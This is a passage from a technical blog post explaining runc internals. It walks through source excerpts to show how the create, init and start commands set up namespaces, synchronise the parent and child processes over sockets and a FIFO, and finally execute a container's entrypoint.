<span class="nt">--log-format</span> json <span class="se">\</span>
<span class="nt">--systemd-cgroup</span> <span class="se">\</span>
start <span class="se">\</span>
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5
</code></pre></div></div>

<h2 id="2-runc-internal">2. Runc Internal</h2>

<p>Here, we try to understand how <code class="language-plaintext highlighter-rouge">runc</code> loads the container by reviewing the source code.</p>

<h3 id="21-cmd-create">2.1. Cmd: create</h3>

<p>The handler of the <code class="language-plaintext highlighter-rouge">create</code> command calls <code class="language-plaintext highlighter-rouge">startContainer()</code>, which indirectly calls <code class="language-plaintext highlighter-rouge">start()</code>. <code class="language-plaintext highlighter-rouge">start()</code> first calls <code class="language-plaintext highlighter-rouge">createExecFifo()</code> [1] to create a FIFO file and then builds the init command by calling <code class="language-plaintext highlighter-rouge">newParentProcess()</code> [2]. Finally, <code class="language-plaintext highlighter-rouge">parent.start()</code> is called to execute <code class="language-plaintext highlighter-rouge">runc init</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// create.go</span>
<span class="k">var</span> <span class="n">createCommand</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">{</span>
    <span class="n">Name</span><span class="o">:</span>  <span class="s">"create"</span><span class="p">,</span>
    <span class="n">Action</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cmd</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">status</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">startContainer</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">CT_ACT_CREATE</span><span class="p">,</span> <span class="no">nil</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">},</span>
<span class="p">}</span>

<span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">start</span><span class="p">(</span><span class="n">process</span> <span class="o">*</span><span class="n">Process</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">process</span><span class="o">.</span><span class="n">Init</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">createExecFifo</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [1]</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="c">// [...]</span>
    <span class="n">parent</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">newParentProcess</span><span class="p">(</span><span class="n">process</span><span class="p">)</span> <span class="c">// [2]</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">parent</span><span class="o">.</span><span class="n">start</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">newParentProcess()</code> prepares the command line for <code class="language-plaintext highlighter-rouge">/proc/self/fd/&lt;runc_fd&gt; init</code>. The command and process information are wrapped into an <code class="language-plaintext highlighter-rouge">initProcess</code> object and returned [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">newParentProcess</span><span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">Process</span><span class="p">)</span> <span class="p">(</span><span class="n">parentProcess</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">safeExe</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">exeseal</span><span class="o">.</span><span class="n">CloneSelfExe</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">stateDir</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">exePath</span> <span class="o">=</span> <span class="s">"/proc/self/fd/"</span> <span class="o">+</span> <span class="n">strconv</span><span class="o">.</span><span class="n">Itoa</span><span class="p">(</span><span class="kt">int</span><span class="p">(</span><span class="n">safeExe</span><span class="o">.</span><span class="n">Fd</span><span class="p">()))</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="n">cmd</span> <span class="o">:=</span> <span class="n">exec</span><span class="o">.</span><span class="n">Command</span><span class="p">(</span><span class="n">exePath</span><span class="p">,</span> <span class="s">"init"</span><span class="p">)</span>
    <span class="n">cmd</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">0</span><span class="p">]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">p</span><span class="o">.</span><span class="n">Init</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">newInitProcess</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">comm</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">parent.start()</code> is then called to fork a child process and execve <code class="language-plaintext highlighter-rouge">runc init</code> [5].</p>

<p>Now there are two processes. The child (<code class="language-plaintext highlighter-rouge">runc init</code>) is the one that <strong>enters the new namespaces</strong> and <strong>sets up the container environment</strong> from the inside, such as mounting the filesystem and applying seccomp rules. It is the same process that will <strong>later execve the user’s command</strong>.</p>

<p>The parent stays on the host as a privileged helper, doing the things the child <strong>can’t do</strong> once it’s inside the namespaces: applying cgroups, providing the uid/gid maps, and running host-side hooks.</p>

<p>The two coordinate over a sync socket, <code class="language-plaintext highlighter-rouge">p.comm.syncSockParent</code> [6]. Once the child is ready, the parent receives the <code class="language-plaintext highlighter-rouge">procReady</code> event [7] and exits.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/process_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">initProcess</span><span class="p">)</span> <span class="n">start</span><span class="p">()</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">cmd</span><span class="o">.</span><span class="n">Start</span><span class="p">()</span> <span class="c">// [5]</span>

    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">manager</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">pid</span><span class="p">());</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// set up cgroups</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">createNetworkInterfaces</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">setupNetworkDevices</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">p</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Config</span><span class="o">.</span><span class="n">HasHook</span><span class="p">(</span><span class="n">configs</span><span class="o">.</span><span class="n">CreateContainer</span><span class="p">,</span> <span class="n">configs</span><span class="o">.</span><span class="n">StartContainer</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="n">ierr</span> <span class="o">:=</span> <span class="n">parseSync</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">comm</span><span class="o">.</span><span class="n">syncSockParent</span> <span class="c">/* [6] */</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">sync</span> <span class="o">*</span><span class="n">syncT</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="k">case</span> <span class="n">procMountPlease</span><span class="o">:</span>
            <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">procSeccomp</span><span class="o">:</span>
            <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">procReady</span><span class="o">:</span> <span class="c">// [7]</span>
            <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">procHooks</span><span class="o">:</span>
            <span class="c">// [...]</span>
        <span class="c">// [...]</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Let’s see how <code class="language-plaintext highlighter-rouge">runc init</code> works.</p>

<h3 id="22-cmd-init">2.2. Cmd: init</h3>

<p>Before looking at the “init” implementation, we have to talk about the <code class="language-plaintext highlighter-rouge">nsexec()</code> constructor.</p>

<p>A Go binary can call C functions through <code class="language-plaintext highlighter-rouge">cgo</code>. Here, <code class="language-plaintext highlighter-rouge">nsexec()</code> is invoked from a C constructor, so it runs before the Go runtime starts, and therefore before <code class="language-plaintext highlighter-rouge">main()</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/nsenter/nsenter.go</span>
<span class="c">/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/</span>
<span class="k">import</span> <span class="s">"C"</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">nsexec()</code> returns immediately if the <code class="language-plaintext highlighter-rouge">_LIBCONTAINER_INITPIPE</code> environment variable does not hold a valid pipe number [1]. For <code class="language-plaintext highlighter-rouge">runc init</code>, the parent process (<code class="language-plaintext highlighter-rouge">runc create</code>) sets this variable, so the check passes and execution continues. The comment in the code says the same thing.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// libcontainer/nsenter/nsexec.c</span>
<span class="kt">void</span> <span class="nf">nsexec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">pipenum</span> <span class="o">=</span> <span class="n">getenv_int</span><span class="p">(</span><span class="s">"_LIBCONTAINER_INITPIPE"</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pipenum</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [1]</span>
        <span class="cm">/* We are not a runc init. Just return to go runtime. */</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This environment variable holds the file descriptor number of one end of the init socket pair [2]. <code class="language-plaintext highlighter-rouge">runc create</code> sets it while preparing the command line of the init process.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">newParentProcess</span><span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">Process</span><span class="p">)</span> <span class="p">(</span><span class="n">parentProcess</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">cmd</span><span class="o">.</span><span class="n">ExtraFiles</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">ExtraFiles</span><span class="p">,</span> <span class="n">comm</span><span class="o">.</span><span class="n">initSockChild</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="n">cmd</span><span class="o">.</span><span class="n">Env</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">Env</span><span class="p">,</span>
        <span class="s">"_LIBCONTAINER_INITPIPE="</span><span class="o">+</span><span class="n">strconv</span><span class="o">.</span><span class="n">Itoa</span><span class="p">(</span><span class="n">stdioFdCount</span><span class="o">+</span><span class="nb">len</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">ExtraFiles</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">),</span>
    <span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Going back to <code class="language-plaintext highlighter-rouge">nsexec()</code>, we can see that it implements a multi-stage state machine to set up the isolated environment.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// libcontainer/nsenter/nsexec.c</span>
<span class="kt">void</span> <span class="nf">nsexec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">switch</span> <span class="p">(</span><span class="n">setjmp</span><span class="p">(</span><span class="n">env</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">STAGE_PARENT</span><span class="p">:</span>
    <span class="c1">// [...]</span>
    <span class="k">case</span> <span class="n">STAGE_CHILD</span><span class="p">:</span>
    <span class="c1">// [...]</span>
    <span class="k">case</span> <span class="n">STAGE_INIT</span><span class="p">:</span>
    <span class="c1">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The diagram below may help you understand the whole flow.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>     stage-0  (STAGE_PARENT)  // in host namespaces
        |  parse netlink bootstrap (cloneflags, uid/gid maps...)
 (child)|
 +------|  clone_parent(&amp;env, STAGE_CHILD)
 |      |
 |      |  stage-1 &gt;&gt; SYNC_USERMAP_PLS
 |      |                                 write /proc/&lt;stage-1&gt;/uid_map, gid_map
 |      |  stage-1 &lt;&lt; SYNC_USERMAP_ACK
 |      |
 |      |
 |      |  stage-1 &gt;&gt; SYNC_RECVPID_PLS
 |      |                                 receives stage-2 pid, forwards up to Go
 |      |  stage-1 &lt;&lt; SYNC_RECVPID_ACK
 |      |  stage-1 &gt;&gt; SYNC_CHILD_FINISH
 |      +  exit(0)
 |
 |
 |
 +-&gt; stage-1  (STAGE_CHILD) // inside several new namespaces
        |  setns(provided namespaces)
        |
        |  try_unshare(CLONE_NEWUSER)
        |  SYNC_USERMAP_PLS &gt;&gt; stage-0
        |  (waiting...)
        |  SYNC_USERMAP_ACK &lt;&lt; stage-0
        |
        |  try_unshare(config.cloneflags)
 +------|  clone_parent(&amp;env, STAGE_INIT)
 |      |
 |      |  SYNC_RECVPID_PLS &gt;&gt; stage-0
 |      |  (waiting...)
 |      |  SYNC_RECVPID_ACK &lt;&lt; stage-0
 |      |  SYNC_CHILD_FINISH &gt;&gt; stage-0
 |      +  exit(0)
 |
 |
 |
 +-&gt; stage-2  (STAGE_INIT) // inside ALL new namespaces, PID 1 in new pidns
        |  final cleanup
        +  return (and continue)
</code></pre></div></div>

<p>The extra fork from stage-1 to stage-2 is required because <code class="language-plaintext highlighter-rouge">unshare(CLONE_NEWPID)</code> <strong>doesn’t move the calling process into the new PID namespace</strong>; only the children it creates afterwards are placed there. That is why, after the stage-1 process has called <code class="language-plaintext highlighter-rouge">setns()</code> and <code class="language-plaintext highlighter-rouge">unshare()</code> for all the namespaces, it has to fork the stage-2 child process, whose PID is 1 in the new namespace.</p>

<p>Once <code class="language-plaintext highlighter-rouge">nsexec()</code> returns in the stage-2 process, the Go runtime starts. Go’s <code class="language-plaintext highlighter-rouge">init()</code> function is a package initializer that runs before <code class="language-plaintext highlighter-rouge">main()</code>; here it handles the entire <code class="language-plaintext highlighter-rouge">init</code> command, so <code class="language-plaintext highlighter-rouge">main()</code> is never executed. Internally, <code class="language-plaintext highlighter-rouge">startInitialization()</code> is called to recover file descriptors, reconstruct the init configuration, and synchronize status with its parent process, <code class="language-plaintext highlighter-rouge">runc create</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// init.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">1</span> <span class="o">&amp;&amp;</span> <span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"init"</span> <span class="p">{</span>
        <span class="n">libcontainer</span><span class="o">.</span><span class="n">Init</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// libcontainer/init_linux.go</span>
<span class="k">func</span> <span class="n">Init</span><span class="p">()</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">startInitialization</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">startInitialization</span><span class="p">()</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">envInitPipe</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">Getenv</span><span class="p">(</span><span class="s">"_LIBCONTAINER_INITPIPE"</span><span class="p">)</span>
    <span class="n">initPipeFd</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">strconv</span><span class="o">.</span><span class="n">Atoi</span><span class="p">(</span><span class="n">envInitPipe</span><span class="p">)</span>
    <span class="n">initPipe</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">NewFile</span><span class="p">(</span><span class="kt">uintptr</span><span class="p">(</span><span class="n">initPipeFd</span><span class="p">),</span> <span class="s">"init"</span><span class="p">)</span> <span class="c">// use as Go file object</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">config</span> <span class="n">initConfig</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewDecoder</span><span class="p">(</span><span class="n">initPipe</span><span class="p">)</span><span class="o">.</span><span class="n">Decode</span><span class="p">(</span><span class="o">&amp;</span><span class="n">config</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">containerInit</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">config</span><span class="p">,</span> <span class="n">syncPipe</span><span class="p">,</span> <span class="n">consoleSocket</span><span class="p">,</span> <span class="n">pidfdSocket</span><span class="p">,</span> <span class="n">fifoFile</span><span class="p">,</span> <span class="n">logPipe</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
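
<p>The “handle everything in <code class="language-plaintext highlighter-rouge">init()</code>” pattern is easy to reproduce in isolation. The toy program below is a sketch, not runc’s code: <code class="language-plaintext highlighter-rouge">isInitInvocation()</code> is a hypothetical helper, and the real initializer does far more than print a line before exiting.</p>

```go
package main

import (
	"fmt"
	"os"
)

// isInitInvocation reports whether the binary was started as "<prog> init".
func isInitInvocation(args []string) bool {
	return len(args) > 1 && args[1] == "init"
}

// init is run by the Go runtime before main.
func init() {
	if isInitInvocation(os.Args) {
		fmt.Println("handling the init command inside init()")
		os.Exit(0) // main() is never reached on this path
	}
}

func main() {
	fmt.Println("regular CLI path in main()")
}
```

<p>Running the binary with <code class="language-plaintext highlighter-rouge">init</code> as its first argument takes the early-exit path; any other invocation falls through to <code class="language-plaintext highlighter-rouge">main()</code>.</p>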

<p><code class="language-plaintext highlighter-rouge">containerInit()</code> handles two init types. If a new container is being created, the init type will be <code class="language-plaintext highlighter-rouge">initStandard</code> [1]; otherwise, when attaching to an already-running container, <code class="language-plaintext highlighter-rouge">initSetns</code> is used [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/init_linux.go</span>
<span class="k">func</span> <span class="n">containerInit</span><span class="p">(</span><span class="n">t</span> <span class="n">initType</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">initConfig</span><span class="p">,</span> <span class="n">pipe</span> <span class="o">*</span><span class="n">syncSocket</span><span class="p">,</span> <span class="n">consoleSocket</span><span class="p">,</span> <span class="n">pidfdSocket</span><span class="p">,</span> <span class="n">fifoFile</span><span class="p">,</span> <span class="n">logPipe</span> <span class="o">*</span><span class="n">os</span><span class="o">.</span><span class="n">File</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">t</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">initSetns</span><span class="o">:</span> <span class="c">// [2]</span>
        <span class="n">i</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">linuxSetnsInit</span><span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="n">i</span><span class="o">.</span><span class="n">Init</span><span class="p">()</span>
    <span class="k">case</span> <span class="n">initStandard</span><span class="o">:</span> <span class="c">// [1]</span>
        <span class="n">i</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">linuxStandardInit</span><span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="n">i</span><span class="o">.</span><span class="n">Init</span><span class="p">()</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>At this point, <code class="language-plaintext highlighter-rouge">runc init</code> is still <strong>root</strong> and has <strong>full privileges</strong> inside the namespaces. It sets up the environment inside the container, such as network routing [3] and the filesystem [4]. Later, it calls <code class="language-plaintext highlighter-rouge">finalizeNamespace()</code> [5] to <strong>drop capabilities</strong>, change the working directory, and close all leaked file descriptors.</p>

<p>Before executing the entrypoint binary [6], it reopens the FIFO file write-only [7]. Opening a FIFO for writing blocks until another process opens it for reading, so <code class="language-plaintext highlighter-rouge">runc init</code> <strong>is blocked</strong> here until someone opens the same FIFO file for reading.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/standard_init_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">linuxStandardInit</span><span class="p">)</span> <span class="n">Init</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">setupNetwork</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">prepareRootfs</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">pipe</span><span class="p">,</span> <span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">finalizeNamespace</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">fifoFile</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">pathrs</span><span class="o">.</span><span class="n">Reopen</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">fifoFile</span><span class="p">,</span> <span class="n">unix</span><span class="o">.</span><span class="n">O_WRONLY</span><span class="o">|</span><span class="n">unix</span><span class="o">.</span><span class="n">O_CLOEXEC</span><span class="p">)</span> <span class="c">// [7]</span>
    <span class="c">// [...]</span>
    <span class="n">name</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">exec</span><span class="o">.</span><span class="n">LookPath</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">0</span><span class="p">])</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">linux</span><span class="o">.</span><span class="n">Exec</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Args</span><span class="p">,</span> <span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Env</span><span class="p">)</span> <span class="c">// [6]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You can probably guess who the reader is. That’s right, it’s <code class="language-plaintext highlighter-rouge">runc start</code>!</p>

<h3 id="23-cmd-start">2.3. Cmd: start</h3>

<p><code class="language-plaintext highlighter-rouge">runc init</code> is blocked and waiting for a reader, and now the status of the container is <code class="language-plaintext highlighter-rouge">Created</code>.</p>

<p>The shim handles the start-container request by executing <code class="language-plaintext highlighter-rouge">runc start</code>, and the action callback calls <code class="language-plaintext highlighter-rouge">container.Exec()</code> [1] when the status of the container is <code class="language-plaintext highlighter-rouge">Created</code> [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// start.go</span>
<span class="k">var</span> <span class="n">startCommand</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">{</span>
    <span class="n">Name</span><span class="o">:</span>  <span class="s">"start"</span><span class="p">,</span>
    <span class="n">Action</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cmd</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">getContainer</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="k">switch</span> <span class="n">status</span> <span class="p">{</span>
        <span class="k">case</span> <span class="n">libcontainer</span><span class="o">.</span><span class="n">Created</span><span class="o">:</span> <span class="c">// [2]</span>
            <span class="c">// [...]</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">Exec</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [1]</span>
                <span class="c">// [...]</span>
            <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Exec()</code> eventually calls <code class="language-plaintext highlighter-rouge">handleFifo()</code> [3], which opens the FIFO file for reading. This unblocks <code class="language-plaintext highlighter-rouge">runc init</code>, which then goes on to execve the entrypoint inside the container.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">Exec</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">exec</span><span class="p">()</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">exec</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">path</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">stateDir</span><span class="p">,</span> <span class="n">execFifoFilename</span><span class="p">)</span>
